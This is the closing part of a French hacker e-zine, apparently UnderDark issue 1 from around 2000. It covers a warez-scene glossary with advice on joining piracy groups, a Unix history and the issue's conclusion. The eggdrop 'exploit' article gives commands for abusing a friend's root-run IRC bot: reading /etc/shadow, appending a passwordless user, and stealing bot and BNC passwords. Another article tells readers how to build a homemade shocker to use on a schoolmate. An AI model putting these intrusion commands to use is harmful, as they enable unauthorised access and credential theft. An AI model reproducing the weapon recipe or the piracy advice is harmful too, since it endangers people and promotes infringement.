le nombre de megs besoin pour avoir le nombre de megs qui a apres. Ex Ratio 1:3 
(le ratio le plus utiliser dans tous les bons groupes) veut dire que chaque
meg envoier de permet de d/l 3 megs ( Amusant non ??? ;o) )

Perm = Un Site FTP qui ne ferme jamais ou presque. On peut aussi utiliser le
terme suivant 24/7 qui veut dire 24h sur 24 et 7 jours sur 7

Ip Mask = C'est le dns qui faut donner au Site Op pour que ca soit juste notre
ip qui peut acceder a son FTP avec notre propre login. Mais bien sur il a des
dns qui change tout le temps alors nous determinons avec une coupe de reconnection
sur le net les chiffres qui ne change pas de notre DNS et a l aide de petite 
astérisque nous cachons les chiffres qui change tjrs. Ex: 207.15.*
( ne penser pas que c le mien ;oP )

0-day = Tous les gogoseses (Appz, Gamez, VCD, PSX, MP3, ISO ) qui est sorti 
aujourd hui. Nous pouvons se retouver facile avec ce systeme car sur les FTP
tous les 0-day sont classer par date ( kel idée brillante !! )

Appz =  Des applications (programme) qui ont été cracker par nos supreme 
cracker . Quel beau boulot ;o)

Gamez = Des jeux qui ont été cracker par les meme style de cracker

VCD = Des Vidéo qu on retrouve sur des CD. Nous retrouvons tous les sortes
de vidéo (Film encore au cinéma, XXX, Des clip vidéo, ect..)

PSX = Des jeux de plastations......

MP3 = Tout le monde sait c koi. Mais d un coup qui a tout nouveau qui nous
lit ben c des musik que l on retrouve dans un ptit format tres cool

ISO = On peut i retrouver des appz ou des gamez. Mais contrairement aux autres
les logiciels que vous d/l ( si vous en d/l avec votre 56k ou moins vous etes
des craquer mental ;oP ) ceux-ci sont la version original que nous pouvons
retrouver sur le CD kan tu l achete. Car les gamez ou appz ont tjrs des bout
de couper. Parfois la musik ou les speech ou bien les video addon.

Nuke = Ce n'est pas les nukes que vous pensez. Ce n'est pas pour 'freezer' un
user mais le Nuke du coter warez est un terme pour les courriers et les SiteOp
Ceci est pour dire ce que tu es en train d'u/l une file deja existante et que
tu es en train de perde tes crédits.C'est tres mauvais signe quand tu vois ca :oP

Bon arretton de parler des differents langage que nous i retrouvons souvent
dans les groupe warez. Mais plutot pkoi pas parler des groupe en tant que tel
Ben c simple un groupe warez est un rassembli de personne qui font une taches
a eux. C'est tres rare qu un groupe garde les ptits "poches" qui font jamais rien
et qui fait juste d/l comme des osti malade. Car pour que le groupe se tienne
debout il ne faut pas juste des d/ldeur. Qu'est-ce que vous en penser ??
Alors vous commencer a entrer dans le warez et vous apprecerier bcq rentrer
dans un groupe mais vous ne savez pas comment ou koi faire pour i rentrer.
Ben c simple, vous avez juste a trouver un groupe warez qui sont en plein 
recruitement ( c vrai que c pas facile, mais avec de l effort vous i parviendrai
je suis sur ). Apres avoir spotter un bon groupe qui vous semble correct vous
demander a quelque sur le channel qui qui s occupe du recruitement ou souvent
sur le channel il a un bot qui vous dit de faire !nfo ou ben !app. Le NFO
est un .nfo qui donne des information sur le groupe genre le founder, ect.
Le App est un txt (ou programme) que le groupe fait pour que vous pussiez
rentrer vos petites information necessaire pour fair partir du groupe. Mais
dans le App vous voyer Courier, SiteOP, Bot Master, Cracker, pis vous savez
pas c koi ben lisez le reste ;o)

Courier = P'tit gars qui transfert des données entre 2 FTP (non le sien)
avec un programme FXP ( moi j utilise FLASH FXP, entk c lui que jtrouve le
meilleur car FXP 8.0 chie tjrs, genre gros gelage d ecran ). Mais la allez
pas penser que vous aller runner pareil a la vitesse que tu d/l avec ton pauvre
ptit 33.6 ben non vous allez au vitesse que vont les 2 site ensemble. J'explique,
ce n'est pas a cause que tu a un 33.6 et que tu transfert d'une T1 a une autre que
tu av encore rouler comme ton 33.6.. ton 33.6 ne fait rien.. toi tu sert juste a faire
le lien entre les2 FTP. C pas merveilleux non ?? ;o)

Site OP = P'tit gars ben riche qui a une bonne connection ( souvent LNPA 
et plus ) souvent sous linux qui est brancher tout le temps ( bien sur qu il
a des fois ou qu il peut le fermer, mais il le ferme le moins souvent
possbile car sinon il va se faire renvoyer. Pis ce p'tit gars la offre sont
beau HD souvent 3-4 car les groupes on besoin de bcq de place et la a l aide
des courier il recoit tout le bon stock genre 0-day et tout. (entk ce que lui
demande)

Cracker = En fait c un gars caller en osti qui crack ( qui pirate les logiciel )les appz, gamez, ISO, pour 
les publier !

Bot Master = P'tit gars qui a un grand coeur et qui donne ses bot pour un groupe
pour pas qu il soit sous bonne garde.. souvent le bot master a de nombreux cadeaux en échange

Bon si vous etes pas capable a rentrer dans un groupe ben voici ce que vous 
pouver faire c est d aller dans les channel ou qu on peut retrouver des pub
site (FTP ouvert a tout le monde pour distribuer les logiciels) et vous 
leecher comme des comcombre. Mais fait gafe car les Pub Site sont kaisment
tjrs rempli de hammer qui d/l comme des fou et qu il n arrete pas. Mais il 
a aussi par xdcc que vous pouver avoir des gugusses. C'est un bot qui vous
donne une commande a faire avev le # de packet que vous désiere avoir ( les
channels sont rendu avec plein de bot comme ca alors c facile a trouver )
Mais il a aussi le truc de se faire des "Friends", ce principe est tres dur
mais une fois faite vous pouver d/l dans la joie totale. Ce principe consiste
a demander a du monde s il pourais pas vous faire un ptit acces sur le FTP qui
est naturellement de bonne qualité et qui a une assez bonne vitesse. Mais
meme a ca le gars que vous avez poigner doit etre pas le parfait bonhomme
qui donne tout sans rein recevoir. Uploader si des files une fois de temps en
temps pis le tour est jouer vous avez un bon FTP pas trop cher ;o) Mais avant
essaier donc de rentrer dans un groupe et faire du courier, car mek que les 
groupes grossise ben le warez va aller mieux et p-e qu un jour nour verrons
le putain de ratio s enlever et sa va etre TOUT LE MONDE CA GO !!!! YAHOO
La j'ai pu d'idée de quoi parler alors si vous avez quelque chose que vous
avez pas compris ou quelque chose que j ai pas parler et que vous aimerez en savoir 
plus ben fait moi s en part ca va mfaire un plaisir te éclairer ton chemin


Bilb0 [Bounty Hunter] [NoT EnOuGh MeMoRy] 
Commentaire ou autre: WhiteForce@Hotmail.com





	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<Utopiste> ouais, mais le but d'irc c'Est rien d'autre que faire un 	*
	*           endroit ou aller durant une compilation un peu longue		*
	*												*
	*************************************************************************




    ___________________________________________________
   / 						      		 \		
  | [15]-- Eggdrop Exploit			     	        |
  | 	   			Par Mind Flayer			  |
  |                       					  |
  |									  | 
   \___________________________________________________/


Bonjour amateur de eggdrop. Dans cette article je vais essayer de te montrer comment hacker
la box qui run l'eggdrop d'un de tes potes.

Bon premierement, ca marche pas avec tout les eggs
1- Tu doit etre owner du egg
2- L'egg doit etre runner en root

ce que ca permet.... tout simplement de voir les fichiers situer un peu partout sur le systeme.
Exemple concret, vous etes owner sur TheLame, vous voulez lui piquer son etc/shadow
Suffit de faire .tcl exec cat /etc/shadow
Et le bot va vous paster le fichier shadow

Bon si l'egg n'est pas en root vous pouver au moins voir le /etc/passwd avec la meme commande
ca donne genre
[19:48] <MindFlayR> .tcl exec cat /etc/passwd
[19:48] <D4rkBitch> Tcl: root:x:0:0:root:/root:/bin/bash
[19:48] <D4rkBitch> Tcl: bin:x:1:1:bin:/bin:
[19:48] <D4rkBitch> Tcl: daemon:x:2:2:daemon:/sbin:
[19:48] <D4rkBitch> Tcl: adm:x:3:4:adm:/var/adm:
[19:48] <D4rkBitch> Tcl: lp:x:4:7:lp:/var/spool/lpd:
[19:48] <D4rkBitch> Tcl: sync:x:5:0:sync:/sbin:/bin/sync
[19:48] <D4rkBitch> Tcl: shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
[19:48] <D4rkBitch> Tcl: halt:x:7:0:halt:/sbin:/sbin/halt
[19:48] <D4rkBitch> Tcl: mail:x:8:12:mail:/var/spool/mail:
[19:48] <D4rkBitch> Tcl: news:x:9:13:news:/var/spool/news:
[19:48] <D4rkBitch> Tcl: uucp:x:10:14:uucp:/var/spool/uucp:
[19:48] <D4rkBitch> Tcl: operator:x:11:0:operator:/root:
[19:48] <D4rkBitch> Tcl: games:x:12:100:games:/usr/games:
[19:48] <D4rkBitch> Tcl: gopher:x:13:30:gopher:/usr/lib/gopher-data:
[19:48] <D4rkBitch> Tcl: ftp:x:14:50:FTP User:/home/ftp:
[19:48] <D4rkBitch> Tcl: nobody:x:99:99:Nobody:/:
[19:48] <D4rkBitch> Tcl: gdm:x:42:42::/home/gdm:/bin/bash
[19:48] <D4rkBitch> Tcl: postgres:x:100:233:PostgreSQL Server:/var/lib/pgsql:/bin/bash
[19:48] <D4rkBitch> Tcl: squid:x:101:234::/var/spool/squid:/dev/null
[19:48] <D4rkBitch> Tcl: xfs:x:102:235:X Font Server:/etc/X11/fs:/bin/false
[19:48] <D4rkBitch> Tcl: www:x:200:200::/home/www:/bin/bash
[19:48] <D4rkBitch> Tcl: mysql:x:201:201:MySQL server:/var/lib/mysql:/bin/bash
[19:48] <D4rkBitch> Tcl: qmaild:x:500:500::/var/qmail:/bin/bash
[19:48] <D4rkBitch> Tcl: qmaill:x:501:500::/var/qmail:/bin/bash
[19:48] <D4rkBitch> Tcl: qmailp:x:502:500::/var/qmail:/bin/bash
[19:48] <D4rkBitch> Tcl: alias:x:503:500::/var/qmail/alias:/bin/bash
[19:48] <D4rkBitch> Tcl: qmailq:x:504:501::/var/qmail:/bin/bash
[19:48] <D4rkBitch> Tcl: qmailr:x:505:501::/var/qmail:/bin/bash
[19:48] <D4rkBitch> Tcl: qmails:x:506:501::/var/qmail:/bin/bash

etc....

Bon ya un autre commande si l'egg est en root
.tcl exec echo "stupid::394:100:/:bin/bash" >> /etc/shadow

sa l'ajoute un user stupid sans password...

Les possibilités sont nombreuses vous avez juste a gosser un peu...

Aussi quelque autre trucs utile si vous avez access au shell,
getter le nickdelegg.users pour avoir la liste des users et les pass crypter..
aussi si le egg est sur un bnc, vous pouvez aller voir dans le dossier /scripts/
et chercher le .tcl bestbnc qui est le plus souvent utiliser (si c'est pas lui regarder
un .tcl qui contient le mot bnc dedans). Vous pourez ainsi avoir le password du bnc 
sans aucun effort....

Amuser vous :)



									Mind Flayer



	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*Notice -- uworld.undernet.org adding GLINE for *~*@12.23.49.85, 		*
	*expiring at 960853786: [5] Don't make DoS threats on Opers (or anyone 	*
      *else) (( }--------!@12.23.49.85 )) set Sat Jun 03 00:51:28 2000 UCT	*
	*												*
	*************************************************************************



    ___________________________________________________
   / 						       		 \		
  | [16]-- Mini Tayser pour débutant			  |
  | 	   			Par {Sm[U]g}		        |
  |                       				        |
  |							              | 
   \___________________________________________________/




Aujourd'hui jai décider de vous parler d'un sujet qui me touche
	à coeur (joke).  Bon vous etre a votre école pi ya tout le temp
	un gros tapette qui vien t'écoeurer pi ta rien pour te fédendre
	ca sé ti po écoeurant ?!? :) Ben moi jai mi sur point un mini
	tayson (élektrocuteur) avec simplement une pile 6 volt !!!!!!!
	
	Bon commençons, premièrement les ingrédients :

- 1 - Un cerveau po trop maganer
- 2 - Un bon 2L de pepsi
- 3 - Une plakette de métal denviron 20 Cm de largeur et 60 Cd de longeur
- 4 - Une pile 9 Volt
- 5 - 2 Fils de 40 Cd chacun ( nimporte lekel sorte de fil mais dabord que le courant passe 
	dedans)

	Bon je crois kon a tout nos ingrédients la :)
	
	Deuxièmement, Prenez la plakette de métal pi trouver un moyen de fixé
	la pile dessus...
	Ensuite prennez un des 2 fils pi fixé le sur la borne positive de la pile
	Et fait la meme chose avec le 2iem fil mais fixé sur la borne négative
	bon avec le 2iem fil que vous avec fixé avec la borne négative couper le 
	en plein millieu de maniere a ce que un bout du fil soit en dessous et 
	lauttre bout soit par dessus pour que quand que tu appui sur celui du haut
	le courant puisse passer. Bon "Twister" les extrémiter des 2 fils ensembles
	pour qu'il soit ensemble ou si vous avez une patente pour souder ( me rappele
	pu du nom :(( ) mais entk souder les 2 fil ensemble au bout pas ou vous les
	avec fixé a la batteri mais lautre bout. Bon presque tout est feni ! vous
	aurez vos mini-défenseur juste aux côtés de vous :) Bon ma vous faie un ti
	Ascii pour mieux vous expliker le fonctionnement de se charabya :) si vous 
	me comprenez mal...
                                        
                                        
                           )())         
                          )    )(        
		_________)_______(____
	        |	(	)    |   <----- Plakette de métal
                |       )           |    
                |       )     )      |  
                |       _(   _(      |  
                |    ___||___||__    |  
                |    |          |    |  	 = La place ou les fille son couper
                |    |  +     - |    |              mettre un bouton ou quelque chose
                |    |          |    |              d'autre
                |    |          |    |  
                |    |          |    |  
                |    |          |    |  
                |    |__________|    |
                |        	     |
                ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

Cela n'est kencore un croquis si vous voulez laméliorer vous le pouvez
car moi jme dit que c un genre de plan artisanal.


Tk Faite vous du fun ak ca ....

									by {Sm[U]g}


	*************************************************************************
	* 				Random Quote Player					*
	*												*
	*<Wyzeman> putain										*
	*<Wyzeman> ya un regroupement de hippie communiste				*
	*<Wyzeman> en bas de ma fenetre							*
	*<Wyzeman> jaurais du amener mon sniper						*
	*												*
	*************************************************************************





    ___________________________________________________
   / 						       		 \		
  | [17]-- Brève histoire d'Unix				  |
  | 	   			Par Mind Flayer		        |
  |                       				        |
  |							              | 
   \___________________________________________________/

Bon, comment commencé cetta article n'est pas une question facile, l'histoire de Unix est asser
longue et décrire chacune des ses variantes serait ennuyant et inutile. J'ai décidé de vous 
résumer l'histoire de Unix pour vous permettre de comprendre les raisons qui en font un
des systemes d'exploitation les plus utilisés encore de nos jours. Aussi si vous avez 
bien compris l'article d'[ALIENS] sur Linux, j''aimerais préciser que les 2 OS sont a 90%
semblable.


Qu'est-ce qu'Unix?
Unix c'est un systeme d'exploitation, c-a-d un programme qui interagit avec les utilisateurs
afin d'executer d'autres programmes, de gérer des ressources d'un ordinateur et de communiquer
avec d'autres machines. Unix est un systeme multi-utilisateur donc il peux etre utilisé
simultanement par plusieurs personnes (essayer de faire ca en Windows9x vous aller comprendre
la différence...). Un utilisateur peux aussi utilisé plusieurs programme un meme temps, donc
Unix est multitâche. Unix est en fait plus qu'un systeme d'exploitation, c'est aussi un 
patchwork pour el dévellopement. Il regroupe plus de 250 commandes différentes allant des plus
simples genre copier un ficher au plus complexes pour la gestion des versions de logiciels ou 
le dévellopement de programmes. Un choix aussi important de commande n'est pas sans raison,
penser a l'interace MS-DOS de Microsoft ou a l'interface du Macintosh de Apple, ils sont
en fait concus pour limiter le spossibiliés de l'utilisateur. Ils offrent peu de commandes
et rarement des commandes fesant la meme fonction comme sur Unix. Par contre, Unix est asser
proche du language parlés les commandes sont comme les verbes, les options celui des adjectifs
et les commandes complexes étant proches des phrases. Votre manière d'executer une commande
peux donc etre differente de celle d'un autre utilisateur sans pour autant altérer le resultat
final. Pire, quelques commande existe dans plusieurs versions differentes, a cause des 
nombreuses version de Unix, UNIXWare de Novell, Solaris de Sun, SCO de Santa Cruz, 
System V Release 4 et BSD Unix de l'université de Berkeley en sont les principales.

Bon enfin l'histoire!
Afin de comprendre pourquoi les systemes Unix nous offre autant de choix, il faut remonter
dans le temps (sorter pas vos DeLorian c'est juste une expression) jusque dans les années 60.
Unix à été concut par deux dévellopeurs Dennis Ritchie et Ken Thompson. il a ensuite évolué
grâce aux efforts de centaines de programmeurs, chacun amenant ca facon de voir un systeme
d'exploitation et de l'interface utilisateur.

Tout a commencé vers la fin des années 60 dans un laboratoire perdu au fond d'un site d'AT&T
du New Jersey. En collaboration avec le MIT (Massachusetts Institute of Technology), AT&T Bell
Labs developpait un systeme d'exploitation massif appellé Multics. En 1969, les Laboratoires
Bell avaient de moins en moins d'illusion sur Multics qui etait lent et cher d'utilisation.
Il fonctionnait aussi sur des gros ordinateurs de General Electric, lesquels etait tres cher
d'utilisation et rapidement dépassé par a technologie. Cette meme année Thompson écrit un jeu
baptisé Space Travel, d'abord sur Multics, puis sur le GECOS (GE Computer Operating System).
Il s'agissait d'une simulation du mouvement des principaux corps du systeme solaire. Le joueur
pilotait un vaisseau et devait observer le paysage puis se poser sur les planêtes et les 
satellites (On etait loin de Unreal Tournement mais quand meme c'était dans les années 60..)
Le jeu était cepandant ennuyant sur les ordinateurs de la General Electric parce que les
performances était irregulieres et plus imporant une partie coûtait environ 100$ en temps de
calcul. pour améliorer son jeu, Thompson a déniché un PDP-7 peu utilisé et à l'aide de Richie,
a réécrit le jeu sur cette machine. Le dévellopement se fesait sur le systeme GE et était porté
(à la main, avec des bandes en papier) vers le PDP-7.

Après avoir explorer les capacités du PDP-7, Thompson n'a pu résisté à poursuivre, en 
créant une version d'un systeme de gestion de fichier puis en ajoutant dews processus, des
utilitaires simples (comme cp et mv) ainsi qu'un interpreteur de commande baptisé shell.
il a fallu attendre 1970 pour que le systeme aille un nom, Unix, basé sur un jeu de mots
sur Multics. Le systeme de fichier des Thompson était bati autour de la notion de i-nodes,
c-a-d des blocs de donnés liés entre eux qui ensemble, composaient un fichier ou un programme,
stocké dans une liste appellé i-list, de sous-fichier et de fichiers spéciaux qui décrivait
les périphériques et jouait le role de pilotes lors des interactions avec l'utilisateur.
Il manquait à cette premiere version la notion de chemin d'accès. Le slash (/) n'était pas 
utilisé et on désignait les sous-répertoires à l'aide d'une combinaison de liens qui s'est vite
révélée trop complexes et a amené les utilisateurs a ne plsu utiliser les sous-repertoires.
L'impossibilité d'ajouter des repertoires alors que le systeme etait en marche etait une 
autre difficulté majeure de cette premiere version.

En 1970, Thompson et son groupe ont demandé et obtenu un PDP-11, afin de créer un systeme 
d'édition et de formatage de texte. Le premier programnme notable sous Unix a été roff,
un outil de formatage de texte qui s'inspirait de Multics, qui lui dérivait a son tour d'un
programme antérieur, runoff, issue du systeme d'exploitation CTSS. Le premier client d'Unix
fut le département des brevets de laboratoire Bell qui avait besoin d'un systeme pour préparer
les dépots de brevets. Unix a fait un malheur et rapidement, d'autre collaborateurs des
Laboratoires Bell ont réclamé leur propres machines Unix.

La language C
En 1969, l'Unix originel n'avait qu'un assembleur élémentaire permettant d'ecrire des 
programmes ; tous les travaux sur le PDP-7 étaient écrit dans se language primitif.
Juste avant l'arrivée du PDP-11, McIlroy a porté sur le PDP-7 un language appellé TMG, que
Thompson a alors essayé a la place d'ecire un compilateur FORTRAN. Ce fut un échec et à la
place Thompson créa le language B. Deux ans plus tard en 1971, Ritchie créait la premiere
version d'un nouveau language fondé sur le B, nommé C. En 1973, tout le systeme Unix avait été
réecrit en C, tant pour la portabilité que pour la vitesse.

Diffusion d'Unix
Dans les années 70, AT&T n'était pas encore divisé en opérateurs régionaux comme aujourd'hui,
et il lui était interdit de vendre son nouveau systeme Unix. Esperant pour le mieux, les 
Laboratoires Bell l'ont distribué, pour une somme sysmbolique, aux facultés et aux universités.
Ces instititutions achetaient aussi de nombreux ordinateurs PDP-11, puissant et peu coûteux,
qui convenait parfaitement a Unix. Rapidement, ce dernier est devenu le systeme d'exploitation
par excellence pour la recherche et le dévellopemeent logiciel. L'Unix que nous connaissont
aujourd'hui n'est cepandant pas le produit des deux dévellopeurs des Laboratoires Bell.
De nombreuses  organisation ont apporté des éléments significatifs au fur et à mesure de ses
évolutions depuis ses premiers pas jusqu'au monstre actuel. Les plus importants sont le shell
C, le protocole TCP/IP, l'éditeur vi, le sendmail, le systeme de routage de courier 
électronique, X Window etc...

Unix fonctionne aujourd'hui sur des ordinateurs de toute tailles, des simples portables 
jusqu'au supercalculateur qui utilise des liquides de refroiddisement spéciaux afin d'éviter
qu'ils fondent. Le chemin parcouru depuis Space Travel est très long et ironiquement, ce jeu
en fait plus partie d'Unix...


												Mind Flayer



	*************************************************************************
	*          ..--""|									*
      *	     | UD  |		Écriver-nous!!		         		*
     	*	     | .---'	      Commentaires, insultes, suggestions		*
  	*	  (\-.--| |---------.								*
  	*	 / \) \ | |          \		team@underdark.cc				*
 	*	 |:.  | | |  The      |								*
	*	 |:.  | |o|   Under   |		ou venez nous voir sur irc	      *
	*	 |:.  | `"`     Dark  |		#UnderDark					*
  	*	 |:.  |_ __  __ _  __ /		[us.undernet.org]				*
  	*	 `""""`""|=`|"""""""`								*
      *    		   |=_|		Site Web: www.underdark.cc			*
      *              |= |									*
	*************************************************************************





Conclusion
==========

Bon, déja un e-zine de terminé, ondevrais vous en pondre un autre au cour des prochains mois.
J'espere que vous avez appécier et je tient a spécifier que pour se premier numéro, certain
article peuvent avoir l'air asser simple, mais c'est seulement question de donner une base
à ceux qui commence. si vous voulez aider ce mag a grandir, venez nous voir sur IRC ,
participer au forum sur notre site web (www.underdark.cc), ecrivez nous un petit mot dans 
le guestbook et surtout, si ca vous tente bien sur, envoyer nous vos articles , nous les 
publieront si leurs contenus sont interessants et véridictes. Nuos cherchons spécialement des 
codeurs (peu importe le language de programmation) alors, si vous etes un codeur en quête
de connaissance, venez faire votre tour sur le canal IRC que nous tacherons de rendre le plus
interessant possible. Avant de terminer j'aimerais préciser que tout les articles de ce zine
sont copyrighter, si vous les copier, veuiller mettre le nick de l'auteur et le nom du zine
dans le haut de l'article. J'aimerais aussi remercier des gens ou des groupes qui s'en eu 
UnderDark n'aurais jamais vu le jour.


DevilCult pour m'avoir montrer quelques trucs lorsque je commencais
Nitrogen pour m'avoir apprit ce qu'est un vrai hacker
Wyzeman pour son aide quand j'ai du trouble sur ma box
timewarp pour me montrer les 1000 et une arnak de linux
wz pour me montrer la voie et aussi me critiquer quand mes idées sont pourris
Bilb0 pour m'avoir accompagner dans mes nuits blanches l'été passé
tout ceux que j'oublie, tout ceux d'underdark, toute la scene francophone specialement
madchat et kitetoa.


											T.H.E. E.N.D.



